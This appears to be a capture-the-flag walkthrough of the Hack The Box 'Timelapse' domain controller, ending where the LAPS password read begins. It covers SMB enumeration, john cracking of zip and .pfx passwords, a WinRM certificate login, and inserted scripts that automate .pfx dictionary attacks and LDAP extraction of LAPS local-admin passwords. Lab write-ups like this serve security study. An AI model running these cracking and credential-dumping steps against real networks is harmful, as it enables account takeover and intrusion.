┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.152
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-19 11:54:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-19T11:55:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m56s
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.152
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.152
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-19 12:10:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2024-01-19T12:12:06+00:00; +7h59m57s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49734/tcp open msrpc Microsoft Windows RPC
61113/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-19T12:11:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m56s, deviation: 0s, median: 7h59m56s
This combination of ports (Kerberos + LDAP + DNS + SMB) suggests this is likely a domain controller. That is supported by the hostname in the Service Info line (DC01) and the name on the TLS cert on 5986 (dc01.timelapse.htb). The LDAP scripts show a domain name of timelapse.htb as well. It’s a bit odd that no script data came back for SMB (445).
In HTB, I’ve regularly run into Windows Remoting / WinRM on TCP 5985. The TLS-wrapped version of that typically runs on TCP 5986, which is what is present here. I’ll be able to interact with it to get a shell if I can find a way to auth.
I’m not sure why nmap couldn’t get any details out of SMB, but crackmapexec does it with no issue:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.152
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.152 -u null
[+] IP: 10.10.11.152:445 Name: 10.10.11.152 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
[+] IPC$ READ ONLY Remote IPC
[+] Shares READ ONLY
As always, with SMB, it pays off to try different tools. crackmapexec isn’t able to list any shares:
But smbclient does (-L to list shares and -N for null authentication):
┌──(kali💀kali)-[~]
└─$ smbclient -L //dc01.timelapse.htb -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
NETLOGON and SYSVOL are standard for any domain controller (DC). Since it’s custom (and the only one I can read according to CME), I’ll start with Shares:
┌──(kali💀kali)-[~]
└─$ smbclient -N //dc01.timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
Dev has a single file, which I’ll grab:
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
HelpDesk has a few files, all about LAPS:
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
Local Administrator Password Solution (LAPS) is a Microsoft tool for managing the passwords of local administrator accounts through the domain: each joined computer gets its own random local admin password, stored on that computer’s object in Active Directory and readable only by principals explicitly granted access. Without LAPS, it’s very challenging for a support team to keep a unique local admin password on each system. This leads to shared credentials, which means that when an attacker gets elevated privileges on one system, they can dump the shared cred and use it to get access on other systems.
LAPS also rotates the administrator passwords on a schedule, so that a password captured by an attacker stops working after the next rotation.
Shell as legacyy
Access winrm_backup.zip:
The zip archive from SMB has a single file:
┌──(kali💀kali)-[~/Desktop]
└─$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 10:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
Based on the name, it seems to contain authentication, either for a user named dev or legacyy. A .pfx file is typically PKCS#12, a password-protected bundle holding a certificate (and so the public key) together with the matching private key; the password both encrypts the private key and keys an integrity MAC over the bundle, so a wrong password is rejected outright. Given the archive name and this file type, it seems likely that if I can get access to this file, I’ll be able to get a shell over WinRM on Timelapse, since WinRM accepts certificate-based authentication.
Crack Zip Password
Trying to open the downloaded archive requires a password:
The hash format doesn’t match anything on the Hashcat list of example hashes, as hashcat actually can’t brute this kind of hash.
I’ll use john:
┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2024-01-19 05:14) 1.754g/s 6100Kp/s 6100Kc/s 6100KC/s surkerior..supalove
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
It cracks it instantly (even in a VM) to “supremelegacy”. It works to unzip:
supremelegacy
Obtain Keys
Crack pfx Password
This post shows the openssl commands to extract the private key and certificate (public key) from a .pfx file. Unfortunately, this one requires a password:
┌──(kali💀kali)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Mac verify error: invalid password?
pfx2john.py will generate a hash for it (piped into tee to both save it to a file and examine the output):
pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash
This time it takes john about half a minute to find the password “thuglegacy”:
Extract Keys
With the password, I can extract the key and certificate. When extracting the key, it asks for the password (I’ll provide “thuglegacy”), and then a password for the output .pem file (anything I want, must be at least four characters):
┌──(kali💀kali)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
I’ll decrypt the key using the password I set above so I don’t have to remember it:
┌──(kali💀kali)-[~/Desktop]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
┌──(kali💀kali)-[~/Desktop]
└─$ ls legacyy_dev_auth.*
legacyy_dev_auth.crt legacyy_dev_auth.key-enc legacyy_dev_auth.pfx.hash
legacyy_dev_auth.key legacyy_dev_auth.pfx
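The following is an added example, not code from the original post (which uses pfx2john/john and two openssl invocations). It builds a throwaway .pfx so it runs offline, shows the password check behind the "Mac verify error" above (the same check pfx2john lets john run without forking openssl), and then extracts the key and certificate in one step each, finishing with a check that the key really belongs to the certificate. openssl on PATH is assumed; the file names, subject CN, wordlist and the demo password "thuglegacy" are made up for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): what a .pfx holds, how the password
# gates it, and how to pull the key and certificate out with openssl.
# Assumptions: openssl on PATH; file names, subject CN, wordlist and the export
# password (thuglegacy) are made up for this demo.
set -u

# Build a throwaway PKCS#12 bundle: a fresh RSA key, a self-signed certificate
# for it, and both packed into one password-protected .pfx.
make_demo_pfx() {            # $1 = output .pfx path, $2 = export password
    dir=$(dirname "$1")
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=legacyy" \
        -keyout "$dir/demo.key" -out "$dir/demo.crt" >/dev/null 2>&1 || return 1
    openssl pkcs12 -export -inkey "$dir/demo.key" -in "$dir/demo.crt" \
        -out "$1" -passout "pass:$2"
}

# A PKCS#12 file carries a MAC keyed from the password, so a wrong password is
# detected before anything is decrypted ("Mac verify error" on the page).
# Returns 0 if the password opens the bundle, 1 otherwise.
pfx_try_password() {         # $1 = .pfx path, $2 = candidate password
    openssl pkcs12 -in "$1" -noout -passin "pass:$2" >/dev/null 2>&1
}

# Dictionary attack using that check. pfx2john + john does the same test far
# faster (no openssl process per guess); this loop only shows what is tested.
crack_pfx() {                # $1 = .pfx path, $2 = wordlist; prints the password
    while IFS= read -r candidate; do
        if pfx_try_password "$1" "$candidate"; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# Extract the private key unencrypted (so no intermediate PEM pass phrase and no
# second 'openssl rsa' step) and the end-entity certificate into $3.key / $3.crt.
pfx_extract() {              # $1 = .pfx path, $2 = password, $3 = output prefix
    openssl pkcs12 -in "$1" -passin "pass:$2" -nocerts -nodes -out "$3.key" 2>/dev/null || return 1
    openssl pkcs12 -in "$1" -passin "pass:$2" -nokeys -clcerts -out "$3.crt" 2>/dev/null || return 1
    chmod 600 "$3.key"
}

# Sanity check before handing the pair to evil-winrm: the key belongs to the
# certificate exactly when their RSA moduli are identical.
pfx_key_matches_cert() {     # $1 = key path, $2 = cert path
    k=$(openssl rsa -in "$1" -noout -modulus 2>/dev/null) || return 1
    c=$(openssl x509 -in "$2" -noout -modulus 2>/dev/null) || return 1
    [ -n "$k" ] && [ "$k" = "$c" ]
}

# Demo run. The wordlist is constructed here; it is not rockyou.
demo() {
    work=$(mktemp -d)
    make_demo_pfx "$work/legacyy_demo.pfx" thuglegacy || return 1
    printf '%s\n' surkerior supalove supremelegacy thuglegacy > "$work/words.txt"
    pw=$(crack_pfx "$work/legacyy_demo.pfx" "$work/words.txt") || return 1
    pfx_extract "$work/legacyy_demo.pfx" "$pw" "$work/legacyy_demo" || return 1
    pfx_key_matches_cert "$work/legacyy_demo.key" "$work/legacyy_demo.crt" || return 1
    echo "password: $pw"
    openssl x509 -in "$work/legacyy_demo.crt" -noout -subject -dates
    rm -rf "$work"
}

demo
```

The extracted .key is written unencrypted, hence the chmod; the page’s two-step route (encrypted PEM, then openssl rsa) ends in the same place. One caveat for OpenSSL 3: a .pfx exported by Windows with the older RC2/3DES ciphers can fail with an "unsupported" error, and adding -legacy to the openssl pkcs12 commands loads the legacy provider that handles it.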
Evil-WinRM:
evil-winrm is the best tool for connecting to WinRM from a Linux host. Looking at the usage shows how I’ll use these keys to connect:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -h
I’ll use the following:
-S - Enable SSL, because I’m connecting to 5986;
-c legacyy_dev_auth.crt - provide the public key certificate
-k legacyy_dev_auth.key - provide the private key
-i timelapse.htb - host to connect to
It works to get a shell as legacyy:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
194bb0ca3cce---------------
Shell as svc_deploy
Enumeration:
There’s nothing too special about the legacyy user:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 11:17:10 AM
Password expires Never
Password changeable 10/24/2021 11:17:10 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/19/2024 10:26:03 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
They are in the “Remote Management Users” group, but I know that because without that group I wouldn’t have been able to execute commands or get a shell over WinRM. The “Development” group could be interesting. I’ll keep an eye out for places that may allow legacyy to go.
No interesting privileges:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PowerShell History:
One place I always check on Windows hosts is the PowerShell history file. And it’s present here:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
If I hadn’t thought to check it manually, WinPEAS would also have shown it.
The file contains some history, including connecting to this host using the creds for the svc_deploy user:
Enumeration
No additional privileges as svc_deploy:
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
There is a really interesting group:
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 11:12:37 AM
Password expires Never
Password changeable 10/26/2021 11:12:37 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 11:25:53 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
LAPS_Readers seems to imply svc_deploy has access to read from LAPS.
LAPS
With LAPS, the DC stores each computer’s local administrator password in the ms-Mcs-AdmPwd attribute of that computer’s object (and the time it is due to rotate in ms-Mcs-AdmPwdExpirationTime). The attribute is marked confidential, so ordinary read access to the computer object is not enough: a principal needs the extended (control access) right on it. It is common to create a group, grant it that right, and put the trusted administrators in it, which gives every member every local admin password in scope.
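As an added example, not the post’s own method (which is Get-ADComputer from the WinRM shell), here is the same read done from the attacker’s Linux box over LDAP as a LAPS_Readers member, plus a parser for the LDIF that ldapsearch returns and the FILETIME conversion for the expiry. The host, bind account, base DN, computer names, passwords and timestamps are made up for the demo; ldapsearch (ldap-utils) is assumed for the live query, and only the parsing runs offline.

```shell
#!/bin/sh
# Added example (not from the original post): reading LAPS passwords from Linux
# via LDAP instead of Get-ADComputer, and parsing the result.
# Assumptions: ldapsearch (ldap-utils) for the live query; the host, bind user,
# base DN, computer names, passwords and timestamps below are made up.
set -u

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100-ns ticks since
# 1601-01-01 UTC. 116444736000000000 ticks is the Unix epoch.
filetime_to_epoch() {        # $1 = FILETIME as a decimal integer
    echo $(( ($1 - 116444736000000000) / 10000000 ))
}

# Live query (not run here). Only principals holding the control-access right on
# ms-Mcs-AdmPwd get the attribute back; everyone else sees the computer without it.
# Use ldaps:// (636) when the DC enforces LDAP signing, and -W instead of -w to
# keep the password off the command line.
laps_query() {               # $1 = DC host, $2 = bind DN/UPN, $3 = password, $4 = base DN
    ldapsearch -LLL -o ldif-wrap=no -H "ldap://$1" -D "$2" -w "$3" -b "$4" \
        '(&(objectClass=computer)(ms-Mcs-AdmPwd=*))' \
        ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
}

# Parse LDIF on stdin into: <computer DN> TAB <local admin password> TAB <expiry epoch>.
# Handles ldapsearch line wrapping (continuation lines start with a space) and
# base64 values ("attr:: ..."), which LDIF uses when a value starts with a space
# or contains non-ASCII, both of which happen with LAPS-generated passwords.
laps_parse() {
    awk '
        function flush() {
            if (dn != "" && pw != "") printf "%s\t%s\t%s\n", dn, pw, ft
            dn = ""; pw = ""; ft = ""
        }
        function handle(line) {
            if (line ~ /^dn: /)                               dn = substr(line, 5)
            else if (line ~ /^ms-Mcs-AdmPwd: /)               pw = substr(line, 16)
            else if (line ~ /^ms-Mcs-AdmPwd:: /)              pw = "b64:" substr(line, 17)
            else if (line ~ /^ms-Mcs-AdmPwdExpirationTime: /) ft = substr(line, 30)
            else if (line == "")                              flush()
        }
        /^ / { buf = buf substr($0, 2); next }   # continuation of the previous line
        { handle(buf); buf = $0 }
        END { handle(buf); flush() }
    ' | while IFS="$(printf '\t')" read -r dn pw ft; do
        case $pw in
            b64:*) pw=$(printf '%s' "${pw#b64:}" | base64 -d) ;;
        esac
        if [ -n "$ft" ]; then epoch=$(filetime_to_epoch "$ft"); else epoch=""; fi
        printf '%s\t%s\t%s\n' "$dn" "$pw" "$epoch"
    done
}

# Convenience lookups over LDIF on stdin: password / expiry epoch for one computer.
laps_password_for() {        # $1 = computer name (CN)
    laps_parse | awk -F '\t' -v cn="$1" 'index($1, "CN=" cn ",") == 1 { print $2 }'
}
laps_expiry_for() {          # $1 = computer name (CN)
    laps_parse | awk -F '\t' -v cn="$1" 'index($1, "CN=" cn ",") == 1 { print $3 }'
}

# Constructed LDIF standing in for ldapsearch output: two made-up computers, the
# second with a wrapped DN and a base64-encoded password (" leadingSpace1!").
SAMPLE_LDIF='dn: CN=WS01,OU=Workstations,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: Xk2;v9Qw#pL7tR1e
ms-Mcs-AdmPwdExpirationTime: 132800000000000000

dn: CN=WS02,OU=Workstations,DC=timelapse,DC=
 htb
ms-Mcs-AdmPwd:: IGxlYWRpbmdTcGFjZTEh
ms-Mcs-AdmPwdExpirationTime: 132800000000000000
'

printf '%s' "$SAMPLE_LDIF" | laps_parse
```

For a live run, pipe laps_query into laps_parse (for example `laps_query dc01.timelapse.htb 'svc_deploy@timelapse.htb' "$PW" 'DC=timelapse,DC=htb' | laps_parse`). The expiry epoch is worth checking before using a password: a value in the past means the LAPS client is due to rotate it on its next cycle, so the credential may not last.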
Read Password:
To read the LAPS password, I just need to use Get-ADComputer and specifically request the ms-mcs-admpwd property: